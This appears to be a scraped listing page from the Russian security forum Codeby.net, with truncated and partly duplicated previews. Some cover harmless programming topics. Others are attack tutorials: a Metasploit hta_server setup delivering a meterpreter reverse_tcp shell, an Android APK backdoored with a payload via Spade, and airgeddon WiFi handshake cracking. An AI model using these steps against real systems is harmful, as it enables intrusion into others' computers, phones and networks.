Форум информационной безопасности - Codeby.net
Статья Взлом удаленного ПК: HTA-server
Всем привет! В этой статье я хочу показать взлом удаленного компьютера, а точнее, получение сессии meterpreter c помощью эксплойта - hta_server.
Появился он недавно в версии Metasploit Framework v4.12.34,
так, что прежде чем начать убеждаемся в ее наличии, если отсутствует, обновляемся:
> apt-get update && apt-get upgrade –y && apt-get dist-upgrade
Запускаем Metasploit Framework:
> msfconsole
В появившейся консоли фреймворка пишем:
Теперь, если все проделано, верно, видим экран с таким содержимым:
Теперь немного теории, первая строка обозначает, что обратное подключение (от жертвы) ожидается на адресе 172.16.0.160 и порту 4444.
Вторая, это ссылка которую необходимо доставить нашей цели, но не просто...
Появился он недавно в версии Metasploit Framework v4.12.34,
так, что прежде чем начать убеждаемся в ее наличии, если отсутствует, обновляемся:
> apt-get update && apt-get upgrade –y && apt-get dist-upgrade
Запускаем Metasploit Framework:
> msfconsole
В появившейся консоли фреймворка пишем:
Код:
use exploit/windows/misc/hta_server
set payload /windows/meterpreter/reverse_tcp
set LHOST 172.16.0.160
set SRVHOST 172.16.0.160
set LPORT 4444
exploitТеперь немного теории, первая строка обозначает, что обратное подключение (от жертвы) ожидается на адресе 172.16.0.160 и порту 4444.
Вторая, это ссылка которую необходимо доставить нашей цели, но не просто...
Статья Лучшие Android-инструменты для пентестинга и кибербезопасности 2025
Доброго времени суток, друзья!
Предлагаю создать здесь полезный и постоянно пополняемый список Android-утилит и приложений, которые мы, специалисты по кибербезопасности и энтузиасты, используем для тестирования на безопасность, анализа сетей и просто для повседневных задач.
Для тех, кто стремится к постоянному развитию в области кибербезопасности, на Codeby.net регулярно публикуются актуальные материалы. Рекомендуем ознакомиться с новейшими статьями, которые помогут вам не потерять мотивацию при самообучении и освоить практические навыки, например: «Сам себе наставник: как не потерять мотивацию при самообучении кибербезопасности» и «Как обучаться информационной безопасности на практике: гид по CTF-платформам».
Мы будем...
Предлагаю создать здесь полезный и постоянно пополняемый список Android-утилит и приложений, которые мы, специалисты по кибербезопасности и энтузиасты, используем для тестирования на безопасность, анализа сетей и просто для повседневных задач.
Для тех, кто стремится к постоянному развитию в области кибербезопасности, на Codeby.net регулярно публикуются актуальные материалы. Рекомендуем ознакомиться с новейшими статьями, которые помогут вам не потерять мотивацию при самообучении и освоить практические навыки, например: «Сам себе наставник: как не потерять мотивацию при самообучении кибербезопасности» и «Как обучаться информационной безопасности на практике: гид по CTF-платформам».
Мы будем...
Статья Нахождение минимального элемента массива
В одной из предыдущих статей мы рассмотрели, как найти максимальный элемент массива, а сегодня хочу показать, как найти минимальный элемент массива в языке c#
Нахождение минимального элемента
Для нахождения минимального элемента массива мы будем использовать метод Min, как один из наиболее распространённых способов для решения данной задачи.
Одномерный массив
В первом примере рассмотрим, как получить минимальное значение в одномерном массиве.
Код:
int [] numbers = {90, 3, 56, 1, 9000, 78};
int minValue = numbers.Min();
//Результат: 1Многомерный массив, в отличие от одномерного массива, не позволяет нам напрямую обратиться к методу Min. Но, это можно легко исправить, если воспользоваться...
Статья Взлом Android-устройства
Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.
Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта , попробуем, для начала, на ней.
Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
После успешного выполнения команды, вводим следующее:
> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)
После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.
> lhost > 192.168.0.103
> lport >...
Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта , попробуем, для начала, на ней.
Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
Код:
git clone https://github.com/suraj-root/spade.gitПосле успешного выполнения команды, вводим следующее:
> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)
После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.
> lhost > 192.168.0.103
> lport >...
Ваши программы на Python
В этой теме вы можете размещать свои программы написанные на Python3
Представлю свой калькулятор написанный еще когда я только начал изучать Python3
калькулятор имеет 5 видов действий и ничего экстраординарного )
умножение , деление , сложение , вычитание , степень
скрипт сохранен в качестве раритета ) и не думаю что будет изменятся
Представлю свой калькулятор написанный еще когда я только начал изучать Python3
калькулятор имеет 5 видов действий и ничего экстраординарного )
умножение , деление , сложение , вычитание , степень
скрипт сохранен в качестве раритета ) и не думаю что будет изменятся
Python:
print("Калькулятор")
print("1)Умножение 2)Деление 3)Сложение 4)Вычитание 5)Степень")
choose = int(input("Выберите действие "))
while choose == 1:
print("Умножение")
x = int(input("Введите первое число "))
y = int(input("Введите второе число "))
z = x * y
print("Результат", z)
while choose == 2:
print("Деление")
x = int(input("Введите первое число "))
y = int(input("Введите второе число "))
z = x / y
print("Результат", z)
while choose == 3:
print("Сложение")
x = int(input("Введите первое число "))
y = int(input("Введите второе число "))
z = x + y...Статья The Harvester: инструмент для сбора открытой информации
The Harvester: глубокий анализ открытых данных для профессионаловИщете мощный инструмент для OSINT и анализа безопасности? The Harvester — ваш выбор для сбора публичной информации. Он эффективно извлекает данные из Google, Bing, LinkedIn и других источников, помогая специалистам в разведке.
Узнайте, как The Harvester упрощает поиск адресов электронной почты, поддоменов, виртуальных хостов и имен пользователей. Этот инструмент необходим для тестирования на проникновение и укрепления кибербезопасности, предоставляя точные и актуальные данные для глубокого анализа.
Идеально для специалистов по безопасности и OSINT-исследователей, которым нужен надежный помощник для сбора информации."Статья Взлом WiFi для "чайников" :)
Взлом WiFi для новичков (читай "для нубов")
Всем привет!
Я думал, что лучше, чем wifite, для новичков не бывает. Я ошибался. Вашему вниманию предлагается скрипт airgeddon
) Это прям вообще огонь, для тех, кто не любит писать руками команды в терминале. Скрипт хватает handshake и предлагает на выбор несколько вариантов их взлома. Все происходит в полуавтоматическом режиме на русском языке!
Установить airgeddon можно на любой Linux, но сам скрипт требует зависимостей. Все они уже имеются в таких дистрибутивах как Kali/Parrot или BlackArch. Я не хочу рассказывать какие зависимости и как установить, потому что скрипт при запуске всё проверяет и сам укажет вам, каких пакетов не хватает.
Скачиваем и запускаем сам скрипт:
После запуска и проверки его работоспособности (установки зависимостей) можно сделать следующее:
Для...
Всем привет!
Я думал, что лучше, чем wifite, для новичков не бывает. Я ошибался. Вашему вниманию предлагается скрипт airgeddon
) Это прям вообще огонь, для тех, кто не любит писать руками команды в терминале. Скрипт хватает handshake и предлагает на выбор несколько вариантов их взлома. Все происходит в полуавтоматическом режиме на русском языке!
Установить airgeddon можно на любой Linux, но сам скрипт требует зависимостей. Все они уже имеются в таких дистрибутивах как Kali/Parrot или BlackArch. Я не хочу рассказывать какие зависимости и как установить, потому что скрипт при запуске всё проверяет и сам укажет вам, каких пакетов не хватает.
Скачиваем и запускаем сам скрипт:
Код:
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon/
sudo bash airgeddon.shДля...
Статья SSH аудит
Всем привет! Хочу ознакомить вас с одним любопытным инструментом, который возможно пригодится в фазе сбора информации. Называется он SSH-audit.
Общая информация о программе.
Изменения в версии v1.0.20160917 SSH-аудит:
· Создание тестов для сравнения Dropbear SSH версий.
Dropbear - это реализация SSH 2 для систем с ограниченным объёмом оперативной памяти, пригодная для большинства задач по защите передачи данных. В ней реализованы все основные компоненты протокола SSH 2, а также поддержка X11 и туннелирование аутентификации (для использования локальных ключей при установлении соединения с удалённого сервера)
· Добавлен Prospector (Python Static Analysis) возможность конфигурации и запуска скрипта.
· Подпись mpint.
· Реализация сравнения версий OpenSSH.
· Bump version.
Установим утилиту:
> git clone http://github.com/arthepsy/ssh-audit
Перейдем в папку и запустим исполняемый...
Общая информация о программе.
Изменения в версии v1.0.20160917 SSH-аудит:
· Создание тестов для сравнения Dropbear SSH версий.
Dropbear - это реализация SSH 2 для систем с ограниченным объёмом оперативной памяти, пригодная для большинства задач по защите передачи данных. В ней реализованы все основные компоненты протокола SSH 2, а также поддержка X11 и туннелирование аутентификации (для использования локальных ключей при установлении соединения с удалённого сервера)
· Добавлен Prospector (Python Static Analysis) возможность конфигурации и запуска скрипта.
· Подпись mpint.
· Реализация сравнения версий OpenSSH.
· Bump version.
Установим утилиту:
> git clone http://github.com/arthepsy/ssh-audit
Перейдем в папку и запустим исполняемый...
Hacker Lab
Категории
Наши курсы
